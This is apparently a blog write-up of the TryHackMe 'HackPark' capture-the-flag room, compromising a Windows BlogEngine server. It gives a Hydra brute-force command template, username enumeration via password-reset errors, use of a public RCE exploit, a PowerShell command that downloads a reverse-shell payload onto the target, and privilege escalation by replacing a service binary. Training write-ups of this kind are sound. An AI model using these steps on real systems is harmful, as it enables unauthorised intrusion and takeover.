Open in app

Sign in

Write

Sign in

HackPark : TryHackMe Writeup

0liverFlow
9 min readDec 9, 2023

--

HackPark

HackPark is an interesting and fairly challenging room that involves hacking a Windows machine by bruteforcing a login page, exploiting a Remote Code Execution (RCE) vulnerability and abusing an insecure service file permission to escalate your privileges.

[Task 1] — Deploy the vulnerable windows machine

What’s the name of the clown displayed on the homepage ?

Let’s try to perform a reverse image search from the clown image.

A simple way to do that consists of using Google image :

Google Reverse Image

Once done, you might be able to find the clown’s name.

[Task 2] — Using Hydra to brute-force a login

Setup the hosts file

Let’s first add the the target machine’s IP address in the /etc/hosts file.

Nmap Scan

Nmap Scan

-Pn : skips the host discovery step. Nmap will consider that the host is up. This is handy when a target doesn’t reply to ICMP packets.

-A : shorthand option that activates service detection, operating system detection, a traceroute and common script scanning.

-p- : scans all 65535 ports

-T4 : increases the scan speed

-oN : requests that normal output be directed to the given filename

Directory/File Enumeration

Knowing that the target is running a web server, let’s perform a directory/file enumeration using Gobuster :

Intercepting HTTP Login Request

Here, we are going to use Burp Proxy to intercept the HTTP request.

Intercepting the HTTP request with Burp Proxy

We need to find a login page to attack and identify what type of request the form is making to the web server. Typically, web servers make two types of requests, a GET request which is used to request data from a web server and a POST request which is used to send data to a server.

You can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found here).

What request type is the Windows website login form using ?

Brute-Force Attack

Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks :

hydra -l <username> -P /usr/share/wordlists/<wordlist>/ IP http-post-form

Before performing the dictionary attack, we need to find a valid username.

We can see that our target is using blogengine which is an open source blogging platform.

Let’s try to check if we can find the default credentials used by a blog powered by blogengine :

Fantastic! According to the website, the default credentials to login to the administration panel are admin:admin.

Let’s check this out :

Login attempt using default credentials

Unfortunately, the login attempt failed. This certainly means that the administrator changed their default password.

Nevertheless, we can exploit the password reset feature to enumerate valid usernames. This is done by monitoring the reset error message.

Here’s how it works :

Well, we got the error message “User not found” when trying to use the username guest.

What if we use the default username admin ?

Wonderful! We got a message different from “User not found” which probably means that the user admin is valid.

FYI, this process could have been automated using Burp Suite as follows :

  1. Intercepting the request with Burp Proxy

2. Sending the intercepted request to intruder (you can use ctrl+i) :

Payload selection

3. Performing a snipper attack against the reset password webpage :

Snipper attack

One thing that directly caught my eye after completing the attack was the difference between the response length of the admin payload (4442) and the other payloads (377x).

Based on that, we can say that the admin username is probably valid.

Now that we have a valid username, we can perform our dictionary attack using hydra.

Hydra is a parallelized, fast and flexible login cracker.

Note 📝 : Feel free to check this cheat sheet if you want to learn more about Hydra.

Password Guessing attack

Great! Now that we get a valid pair of credentials, let’s connect to the admin account:

Administrator page

[Task 3] — Compromise the machine

Now you have logged into the website, are you able to identify the version of the BlogEngine ?

BlogEngine version

After finding the BlogEngine’s version, we can use searchsploit to research exploits related to that version.

For that, we only need to execute the following command :

searchsploit BlogEngine <version>

Use the exploit database archive to find an exploit to gain a reverse shell on this system.

What is the CVE ?

CVE-xxxx-xxxx

Using the public exploit, gain initial access to the server.

Who is the webserver running as ?

Once you download the right exploit, make sure to read all the instructions in order to understand how to use it.

Then you need to setup your netcat listener and run the exploit to obtain the reverse shell :

Initial Access obtained

[Task 4] — Windows Privilege Escalation

In this task we will learn about the basics of Windows Privilege Escalation.

First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.

Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.

Before generating the reverse shell, we first need to find the architecture of the OS used by our target. For that, we can execute the following command :

wmic OS get OSArchitecture

OS Architecture
Generating a payload using msfvenom
Python Listener

After setting up our Python listener, we can download the reverse shell on the target computer using powershell :

powershell -c "Invoke-WebRequest -Uri URL -OutFile FILENAME"

Downloading the reverse shell on the target machine

Generally speaking, the files downloaded on the target system are placed in the C:\Windows\Temp directory which is a temporary directory.

Once done, let’s run a handler using msfconsole :

Setting up a handler
Executing the reverse shell on the target machine
Meterpreter session opened

What is the OS version of this windows machine?

We can use the sysinfo meterpreter command to get information about the remote system, such as OS.

What is the name of the abnormal service running?

Here, we are going to download WinPeas, then execute it on the target machine.

WinPeas is a great tool that enumerates the system and attempts to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!

Uploading WinPeas on the target system
WinPeas Execution
Local users information
Services information

What is the name of the binary you’re supposed to exploit?

Abnormal service logs

Using this abnormal service, escalate your privileges!

Note 📝 : As you can see on the figure above, the binary of the abnormal service is run every 30 seconds by the Administrator user.

What is the user flag (on Jeffs Desktop)?

To retrieve the user flag, we’re firstly going to replace the binary of the abnormal service with our reverse shell payload, then rename our payload using the same name like the exploitable binary.

If you don’t rename your reverse shell payload using the same name like the exploitable binary, it will not be executed.

Once done, we need to run our handler and then wait for the meterpreter session to be established.

Setting up the handler

After a few seconds, we get our meterpreter session.

This is a privileged session because our payload has been executed by the Administrator user.

That’s it, we can now retrieve the user and the root flags.

What is the root flag?

[Task 5] — Privilege Escalation Without Metasploit

In this task we will escalate our privileges without the use of meterpreter/metasploit!

Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.

Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.

Now we can generate a more stable shell using msfvenom, instead of using a meterpreter, This time let’s set our payload to windows/shell_reverse_tcp

Generating the payload
Downloading the payload on the target system

Here, I used the certutil instead of the powershell Invoke-WebRequest command just for showing you another way to do that.

Executing the reverse shell payload on the target system
Obtaining the reverse shell

Now you know how to pull files from your machine to the victims machine, we can pull winPEAS.bat to the system using the same method! (You can find winPEAS here)

Using winPeas, what was the Original Install time? (This is date and time)

Downloading WinPeas & Setting up a Python server
Downloading WinPeas on the target system
WinPeas execution

See that, I was not able to find the original install time using WinPeas, I finally used the built-in system command systeminfo :

Original Install Date
Mission Complete

Wrapping Up

To connect the dots, this was a quite challenging room but at the same time fun. We explored lots of techniques from the initial access to the privilege escalation stage using various tools.

That’s it! Do not forget to click on the little clap icon below if you enjoyed the content and to subscribe to my newsletter to keep up with my latest articles.

Resources

https://images.google.com/

https://blogengine.io/docs/get-started/

https://www.exploit-db.com/

https://github.com/carlospolop/PEASS-ng/releases/tag/20231203-9cdcb38f

Contact

GitHub : https://github.com/0liverFlow

Tryhackme Writeup
Hackpark
Ctf
Windows
Pentesting

--

--

0liverFlow
0liverFlow

Written by 0liverFlow

144 Followers
3 Following

Pentester | Enjoy breaking and building stuffs

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams